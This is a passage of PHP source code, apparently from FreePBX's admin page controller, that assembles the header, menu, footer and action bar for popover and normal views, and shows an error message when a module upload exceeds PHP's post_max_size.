            $fw_gui_html .= framework_include_css();
            $header['module_name'] = $module_name;
    }

    show_view($amp_conf['VIEW_HEADER'], $header);

    // If processing posback (fw_popover_process) and there are errors then we
    // display again, otherwise we ignore the $content and prepare to process
    //
    $show_normal = $fw_popover_process ? fwmsg::errors() : true;
    if ($show_normal) {
        // provide beta status
        if (isset($fpbx_menu[$display]['beta']) && strtolower($fpbx_menu[$display]['beta']) == 'yes') {
            //TODO: Why is this in a global system variable?
            $fw_gui_html .= load_view($amp_conf['VIEW_BETA_NOTICE']);
        }
        $fw_gui_html .= $content;
        $popover_args['popover_mode'] = 'display';
    } else {
        $popover_args['popover_mode'] = 'process';
    }

    //send footer
    $o = FreePBX::create()->View->getScripts();
    $footer['compiled_scripts'] = $o;
    $footer['js_content'] = load_view($amp_conf['VIEW_POPOVER_JS'], $popover_args);
    $footer['lang'] = $language;
    $footer['covert']       = in_array($display, array('noauth', 'badrefer')) ? true : false;
    $footer['extmap']               = !$footer['covert']
        ? framework_get_extmap(true)
        : json_encode(array());
    $footer['module_name'] = $module_name;
    $footer['module_page'] = $module_page;
    $footer['benchmark_starttime'] = $benchmark_starttime;
    $footer['reload_needed'] = false; //we don't display the menu in this view so irrelivant
    //These changes will hide the excess footer which is just empty anyways, also it sets our body background to transparent
    //scripts in footer are still run eventhough it's hidden
    //hack into the footer and change the background to be transparent so it seems like we "belong" in the dialog box
    $footer['footer_content'] = "<script>$('body').css('background-color','transparent');$('#footer').hide()</script>";
    $footer['remove_rnav'] = true;
    $fw_gui_html .= load_view($amp_conf['VIEW_FOOTER'], $footer);
    echo $fw_gui_html;

} else {
    // Save the last module page normal view in the session. This is needed in some scenarios
    // such as a post back within a popOver destination box so that the drawselects() can be
    // properly generated within the context of the parent window that it will be filled back
    // in with.
    //
    $_SESSION['module_name']            = $module_name;
    $_SESSION['module_page']            = $module_page;

    $admin_template = $template = array();
    //get the page contents from the buffer
    $page_content   = ob_get_contents();
    ob_end_clean();

    //add header
    $header['title']    = framework_server_name();
    $header['amp_conf'] = $amp_conf;
    $header['use_popover_css'] = ($fw_popover || $fw_popover_process);

    $o = FreePBX::create()->Less->generateMainStyles();
    $header['compiled_less_files'] = $o['compiled_less_files'];
    $header['extra_compiled_less_files'] = $o['extra_compiled_less_files'];

    //if we have a module loaded, load its css
    if (isset($module_name)) {
            $header['module_name'] = $module_name;
    }

    echo load_view($amp_conf['VIEW_HEADER'], $header);

    if (isset($module_name)) {
            echo framework_include_css();
    }

    // send menu
    $menu['fpbx_menu']      = $fpbx_menu; //array of modules & settings
    $menu['display']        = $display; //currently displayed item
    $menu['authtype']       = $amp_conf['AUTHTYPE'];
    $menu['reload_confirm'] = $amp_conf['RELOADCONFIRM'];
    $menu['language'] = array(
        'en_US' => _('English'). " (US)"
    );
    $langKey = !empty($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en_US';
    foreach(glob($amp_conf['AMPWEBROOT']."/admin/i18n/*",GLOB_ONLYDIR) as $langDir) {
        $lang = basename($langDir);
        $menu['language'][$lang] = function_exists('locale_get_display_name') ? locale_get_display_name($lang, $langKey) : $lang;
    }

    //add menu to final output
    echo load_view($amp_conf['VIEW_MENU'], $menu);

    // provide beta status
    if (isset($fpbx_menu[$display]['beta']) && strtolower($fpbx_menu[$display]['beta']) == 'yes') {
        echo load_view($amp_conf['VIEW_BETA_NOTICE']);
    }

    //FREEI-918 - if the uploaded file's size exceeds php's post_max_size, PHP drops
    //the _POST and _FILES values and continues with the request. There is no error value
    //to properly know what happened. Meeting this set of conditions is enough evidence
    //to assume module upload from Module Admin failed due to the file being too large.
    //The page_content is being overwritten to display an error and option to try again,
    //instead of going back to the admin dashboard/index
    if ((preg_match('/config.php\?display=modules&action=upload/', $_SERVER['HTTP_REFERER'])
        || preg_match('/config.php\?display=updates&action=upload/', $_SERVER['HTTP_REFERER'])) &&
        empty($_FILES) && empty($_POST) && $_REQUEST['display'] === 'index' &&
        $_SERVER['CONTENT_LENGTH'] > 0)
    {
        $postMaxSize = ini_get('post_max_size');
        $page_content =
            '<div class="error">
                <p>' .
                    _("There was an error uploading the module tar ball due to its size being greater than post_max_size {") . $postMaxSize . '}.<br>'.
                    _("Please host the file and use the \"Download (From Web) option\", or ssh to your FreePBX system and use
                        \"fwconsole ma downloadinstall [url]\" to install the module from a URL.") . "<br>" .
                    _("For further help, please contact") .
                    " <a href=\"https://support.sangoma.com\" target=\"_blank\">" . _("Sangoma Support") . "</a>."
                    .
                '</p>
                <input type="button" value="' . _("Go Back") . '" onclick="history.back()">
            </div>';
    }

    //send actual page content
    echo $page_content;

    //send footer
    $o = FreePBX::create()->View->getScripts();
    $footer['compiled_scripts'] = $o;
    $footer['lang'] = $language;
    $footer['covert']       = in_array($display, array('noauth', 'badrefer')) ? true : false;
    $footer['extmap']               = !$footer['covert'] ? framework_get_extmap(true) : json_encode(array());
    $footer['module_name']          = $module_name;
    $footer['module_page']          = $module_page;
    $footer['benchmark_starttime']  = $benchmark_starttime;
    $footer['reload_needed']        = $footer['covert'] ? false : check_reload_needed();
    $footer['footer_content']       = load_view($amp_conf['VIEW_FOOTER_CONTENT'], $footer);

    if (!$footer['covert'] && function_exists("sysadmin_hook_framework_footer_view")) {
        $footer['sysadmin'] = sysadmin_hook_framework_footer_view();
    }

    $footer['covert'] ? $footer['no_auth']  = true : '';

    $footer['action_bar'] = null;
    //See if we should provide an action bar
    try {
        $bmomodule_name = $bmo->Modules->cleanModuleName($module_name);
        if($bmo->Modules->moduleHasMethod($bmomodule_name,"getActionBar")) {
            $ab = $bmo->$bmomodule_name->getActionBar($_REQUEST);
            if(is_array($ab)) {
                //submit, duplicate, reset, delete.
                //http://issues.freepbx.org/browse/FREEPBX-10611
                uksort($ab, function($a, $b) {
                    $order = array(
                        "submit",
                        "duplicate",
                        "reset",
                        "delete"
                    );
                    $posA = array_search($a, $order);
                    if($posA === false) {
                        $posA = 999;
                    }
                    $posB = array_search($b, $order);
                    if($posB === false) {
                        $posB = 999;
                    }
                    return ($posA < $posB) ? -1 : 1;
                });
                $footer['action_bar'] = $ab;
            } else {
                $footer['action_bar'] = array();
            }
        }
    } catch (Exception $e) {
        //TODO: Log me
    }
    $footer['nav_bar'] = null;
    //See if we should provide an action bar
    try {
        $bmomodule_name = $bmo->Modules->cleanModuleName($module_name);
        if($bmo->Modules->moduleHasMethod($bmomodule_name,"getRightNav")) {
            $footer['nav_bar'] = $bmo->$bmomodule_name->getRightNav($_REQUEST);
        }
    } catch (Exception $e) {
        //TODO: Log me
    }
    echo load_view($amp_conf['VIEW_FOOTER'], $footer);
}